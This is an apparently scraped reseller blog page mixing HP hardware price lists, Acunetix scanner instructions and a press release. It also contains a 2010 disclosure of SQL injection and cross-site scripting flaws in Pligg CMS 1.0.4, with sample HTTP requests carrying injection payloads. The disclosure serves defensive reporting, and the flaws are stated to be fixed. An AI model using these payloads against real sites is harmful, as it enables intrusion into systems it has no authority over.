505684-001 – $1795ea – QTY 10 Available
HP Renew (Factory Sealed/Refurbished/FULL HP Warranty)
HP DL320 G6 E5530 2.4GHz 6GB 4LFF SATA/SAS P410/256mb RPS
HP Renew (Factory Sealed/Refurbished/FULL HP Warranty)
HP DL320 G6 E5530 2.4GHz 6GB 4LFF SATA/SAS P410/256mb RPS
Congratulations to the Veeam Team for winning 4 awards at VMworld 2010 – the first company ever to do so! Read about our award winning entries and find out what makes these Veeam products so special!
For more information about Veeam Backup and Replication or other Veeam Virtualization solutions click here.
Incoming HP Proliant Renew Options
(HP Factory Sealed/HP Refurbished/FULL HP Warranty)
497767-b21 – $260ea
HP 8GB (2×4GB)PC2-6400 800MHz DDR2 Registered ECC
454146-b21 - $255ea
HP 1TB 7.2K rpm Hot Plug 3.5″ SATA Midline Hard Drive
507632-B21 – $495ea
HP 2TB 3G SATA 7.2K RPM LFF (3.5-INCH) MIDLINE 1YR
500658-b21 – $179ea
HP 4GB PC3-10600 DDR3 1333MHz 240-Pin REGISTERED DIMM
507125-b21 – $225ea
HP 146GB 10K 600MBps 2.5″ SAS SFF Dual-Port Hard Drive
504062-b21 -$299ea
HP 146GB 3G 15K 2.5″ SFF /SAS Hard Drive
397415-b21 - $345ea
HP 8GB(2×4GB) PC2-5300 FB-DIMM 240-pin DDR2 667MHz ECC
It is possible to manually crawl your website using a web browser. From these manually crawled links, then it is possible to build a website structure which the final scan will target. This is useful when in some rare cases, certain web applications cannot be automatically crawled due to some strange coding ambiguities. The following procedure offers a reliable workaround.
1. Configure the web browser
Configure your web browser of choice to proxy all the traffic through the Acunetix WVS HTTP Sniffer tool, as shown in the above screen shot. Presuming that the web browser is running on the same machine where Acunetix Web Vulnerability Scanner is installed, set the proxy server IP to 127.0.0.1 and the proxy server port to 8080.
2. Start the HTTP Sniffer and start browsing the website using the configured web browser.
3. Once ready, stop the HTTP sniffer. Save captured data by selecting ‘Save Logs’ from the Actions drop down menu.
4. Import Logs to Crawler
In the Site Crawler node, click the ‘Build Structure from HTTP Sniffer log’ button (highlighted in the above screen shot) to import the captured data into the Site Crawler.
5. Save the crawler import results by selecting ‘Save Results’ from the Actions drop down menu.
6. Launch the Scan
Click on the New Scan button to launch the scan wizard. In the first step of the Scan Wizard select the option ‘Scan using saved crawling results’ as highlighted in the above screen shot. Proceed with completing the scan wizard to launch the automated scan against the manually browsed website.
Note: Only the links you’ve manually crawled will be automatically scanned. Other pages in the website, even those linked from manually crawled pages will not be crawled or scanned.
Vulnerability checks in Acunetix Web Vulnerability Scanner version 7 consists of two files;
1. Writing the Vulnerability check script
To write a new vulnerability check script, you can use any text editor of your choice, or else WVS Scripting tool which is available for free.
The tool and detailed Acunetix WVS scripting reference can be downloaded from the following URL; http://www.acunetix.com/download/tools/Acunetix_SDK.zip. We recommend you use our tool since it is specifically designed to assist you in writing Acunetix WVS Vulnerability Checks. It also includes a number of functions to help you test your scripts.
2. Writing the vulnerability XML file (VulnXML format)
To create a new XML file using VulnXML format, use Acunetix WVS Vulnerability Editor which is available from the Acunetix Web Vulnerability Scanner Program Group.
Follow the below procedure to create a new VulnXML file for a custom vulnerability check;
In the ‘References’ tab you can specify links to additional information about the vulnerability (e.g., cause and related fix). You can add additional references by right clicking and selecting ‘Add reference’.
Note: The built-in vulnerability checks cannot be modified. Onlly their VulnXML files (vulnerability details) can be modified.
Modifying a custom vulnerability check
To modify a custom vulnerability check, open the script in the WVS Scripting tool and proceed with the desired changed. The WVS Scripting tool and detailed scripting reference are available from; http://www.acunetix.com/download/tools/Acunetix_SDK.zip.
Modifying the vulnerability VulnXML file
To modify an existing vulnerability check, open Acunetix Vulnerability Editor and select the script to edit from the VulnXML node. Click on the section which you would like to edit and proceed with the text changes. Once ready click on the ‘Save’ icon (first icon) in the top left corner or the Vulnerability Editor.
HP OVERSTOCK DEAL! Everything is new/factory sealed
| MFG P/N | Description | List Price | Approved Pricing |
| AS726US#ABA | 8530p | $2,191 | $1,394 |
| SG437UP#ABA | 6930p | $1,712 | $1,189 |
| AT786US#ABA | 2730p | $2,498 | $1,399 |
| WZ284UA#ABA | 6930p | $1,923 | $1,389 |
| WZ285UA#ABA | 6930p | $1,953 | $1,389 |
| WZ286UA#ABA | 6930p | $1,983 | $1,389 |
| AZ058US#ABA | 6930p | $1,828 | $1,299 |
| AR218US#ABA | 8730w | $2,877 | $1,379 |
| AS770US#ABA | 8530p | $2,010 | $1,259 |
| AV652US#ABA | 8530w | $2,907 | $1,529 |
| FM997UT#ABA | 5310m | $899 | $789 |
| FN007UT#ABA | 4310s | $999 | $969 |
| FM996UT#ABA | 5310m | $699 | $629 |
| FM998UT#ABA | 5310m | $999 | $799 |
| FN098UT#ABA | 5102 | $399 | $399 |
| FN011UT#ABA | 4415s | $625 | $589 |
| FN012UT#ABA | 4415s | $699 | $629 |
| FN092UT#ABA | 8440w | $1,425 | $1099 |
Just arrived – Factory Sealed/Refurbished/1 year HP Warranty – Save up to 40%!!!
Alliance Technology Partners is a leading reseller of HP Factory Refurbished products including Refurbished Proliant Servers, Refurbished Procurve Networking Products, Refurbished HP Notebooks, Refurbished HP Computers, Refurbished HP Workstations, and more!
Submitted by Bogdan Calin on September 3, 2010 – 8:09 pm
While beta testing the latest version of Acunetix WVS v7, we found a large number of security vulnerabilities in various web applications. In the following days we will publish some of these vulnerabilities. Note that we will not publish vulnerabilities found in applications that are not commonly used or in beta stage.
One of the tested web applications is Pligg;
Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publishing software that encourages visitors to register on your website so that they can submit content and connect with other users.
The following web vulnerabilities were found in Pligg CMS Version 1.0.4;
Technical details about each web vulnerability are below;
1. SQL injection in “/pliggcms_1_0_4/login.php“, parameter “email“.
Source file: /var/www/pliggcms_1_0_4/libs/db.php line: 222
Additional details:
SQL query:
1 |
SELECT * FROM `pligg_users` where `user_email` = '1ACUSTART'"*/rn ACUEND' AND user_level!='Spammer' |
“mysql_query” was called.
Stack trace:
1 |
1. ezSQL_mysql::query([string] "SELECT * FROM `pligg_users` where `user_email` = '1ACUSTART'"*/rn ACUEND' AND user_level!='Spammer'") |
2 |
2. ezSQLcore::get_row([string] "SELECT * FROM `pligg_users` where `user_email` = '1ACUSTART'"*/rn ACUEND' AND user_level!='Spammer'") |
Sample HTTP Request:
01 |
POST /pliggcms_1_0_4/login.php HTTP/1.1 |
02 |
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c |
03 |
Acunetix-Aspect: enabled |
04 |
Content-Length: 68 |
05 |
Content-Type: application/x-www-form-urlencoded |
06 |
Cookie: PHPSESSID=4c7d8e111f3ec5e90e664e26f365cc04; mnm_user=tmp; mnm_key=dG1wOjIyZkpqa1BveUhCVFE6NWY1YTg5NTJkYzUzODI4NGYwOTA0Y2Q0NTUzNzk5NDE%3D; template=wistie |
07 |
Host: webapps7:80 |
08 |
Connection: Keep-alive |
09 |
Accept-Encoding: gzip,deflate |
10 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) |
11 |
|
12 |
email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f |
2. Cross-site Scripting vulnerability in “/pliggcms_1_0_4/user.php”, parameter “category”.
Attack details
URL encoded GET input categorywas set to ” onmouseover=prompt(938687) bad=”
The input is reflected inside a tag element between double quotes.
The input is reflected inside a tag element between single quotes.
Sample HTTP Request:
01 |
POST /pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search HTTP/1.1 |
02 |
Content-Length: 9 |
03 |
Content-Type: application/x-www-form-urlencoded |
04 |
Cookie: PHPSESSID=4c7d8e111f3ec5e90e664e26f365cc04; mnm_user=tmp; mnm_key=dG1wOjIyZkpqa1BveUhCVFE6NWY1YTg5NTJkYzUzODI4NGYwOTA0Y2Q0NTUzNzk5NDE%3D; template=wistie |
05 |
Host: webapps7:80 |
06 |
Connection: Keep-alive |
07 |
Accept-Encoding: gzip,deflate |
08 |
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) |
09 |
|
10 |
username= |
These vulnerabilities were reported to the Pligg team on 22/7/2010 via the contact form from their website and they were fixed in latest version of Pligg. If you are using Pligg, download the latest version from their website.
New scanning engine with improved vulnerability detection AND verification makes finding and fixing security issues in web applications easier.
September 1, 2010 – Acunetix, a market leader in web application security scanning technology, today announced version 7 of its popular Web Vulnerability Scanner. With the new human like vulnerability verifying techniques, revolutionary scanning engine and support for a wider variety of web applications, Acunetix re-establishes its technology lead in web application security. Acunetix WVS Version 7 also features improved performance, less false positives and detection of a wide range of new web vulnerability types.
“With Acunetix WVS v7 we focused on finding more vulnerabilities, reducing false positives, and on improving scanner performance,” said Robert Abela, Acunetix Technical Manager. “As a result, Acunetix 7 is now 300% faster, can reduce false positives up to 50% and detects new vulnerabilities such as stored directory traversal. This helps businesses reduce the time and resources needed to secure their web applications significantly.”
Unique vulnerability verifying technique reduces false positives
Acunetix v7 includes new advanced vulnerability verifying techniques which result in much less false positives, and thus saves time of security administrators trying to reproduce such situations. Such accuracy is achieved by sending a number of test inputs to the web application, and depending on the response, Acunetix v7 will automatically determine which web vulnerability checks to launch against the web application.
New faster scanning engine reduces time to scan a website by up to 300%
Acunetix Web Vulnerability Scanner Version 7 includes a new fast multi-threaded scanner that can scan on more threads at a time and more efficiently. Scans that could take hours to complete now can be done in minutes, depending on website structure and web applications.
When a web security threat is discovered, Acunetix WVS Version 7 presents the developers with a more precise and understandable technical and vulnerability remediation information, to help them fix the issue in a much shorter time. To improve understanding, different variants of the vulnerability are gathered in one detailed vulnerability report. Acunetix v7 can also re-check a fix for a particular vulnerability, without having to rescan the entire website.
Thanks to the new revolutionary scanning engine and website crawler, Version 7 is able to find much more vulnerabilities than ever before. The new site crawler’s in-depth analysis of the website presentation layer discovers more website parameters and inputs. Acunetix 7 is therefore capable of finding many more vulnerabilities in a larger variety of different web applications.
Scan a wider range of web applications
Acunetix v7 is also able to crawl and scan a wider variety of web technologies. Support for Web 2.0 applications has been improved, and also session handling. All of the advanced penetration testing tools have been rewritten to support Web 2.0 requests, such as JSON, XML and more.
HTTP authentication
Acunetix WVS v7 now supports more than a single pair of HTTP credentials for the same host. Thanks to the new HTTP authentication settings node, one can pre-define credentials per host, directory and even file.
Acunetix v7 now has improved support for creating custom vulnerability checks. Vulnerability checks are written in JavaScript, the most popular scripting language with web developers, and can thus be easily adjusted or extended. A scripting tool and SDK are also available to assist developers in writing custom web vulnerability and security checks.
Subscription based licenses now also include the maintenance agreement and are thus significantly cheaper. In addition free support and free version upgrades are included.
Other Features
■New graphical scan status interface shows more information about a web scan in progress
■Avoid the lengthy process of manually analyzing the code by specifying the label or tag instead of actual parameter name
■Verify that AcuSensor Technology is correctly installed with a simple click of a button
■During a scan, less bandwidth is consumed and less stress is put on the server thanks to improved network traffic handling
■A number of new network security checks have been added and other ones improved.
Acunetix WVS Trial Edition
Download Acunetix Web Vulnerability Scanner v7 trial edition from here